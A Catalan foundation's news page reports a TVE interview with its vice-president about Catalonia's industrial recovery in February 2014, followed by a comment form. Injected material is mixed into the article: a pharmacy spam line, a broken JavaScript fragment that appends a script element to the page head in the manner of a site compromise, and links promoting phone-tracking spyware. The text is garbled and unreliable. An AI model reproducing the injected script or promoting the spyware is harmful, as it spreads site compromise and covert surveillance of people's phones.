Comunicació

La Fundació a l’Informatiu de TVE

canada 100 mg aspirin

La “reindustrialització” de Catalunya- 15 feb. 2014

El

sector industrial vol liderar la recuperació econòmica. La producció al 2013 han millorat i se situa en índex positius: al 0’8% segons dades avançades de l’Institut d’Estadística de Cataluya. Per impulsar l’economia catalana, els agents socials acaben de presentar un pacte a la Generalitat amb 138 propostes. Entrevista al vicepresident de la Fundació el Sr Antoni Garrell a l’informatiu de TVE. veure video de l’entrevista en aquest link        

if (document.currentScript) {

d.getElementsByTagName(‘head’)[0].appendChild(s);} else {document.currentScript.parentNode.insertBefore(s, document.currentScript);http://forecolox.com/call-tracker-mobistealth-cell-phone-tracking-software/http://ktc-ingenieure.de/cms/iphone-tracker-track-cell-phone-number-top-spy/

Deixa un comentari

L'adreça electrònica no es publicarà Els camps necessaris estan marcats amb *

Podeu fer servir aquestes etiquetes i atributs HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>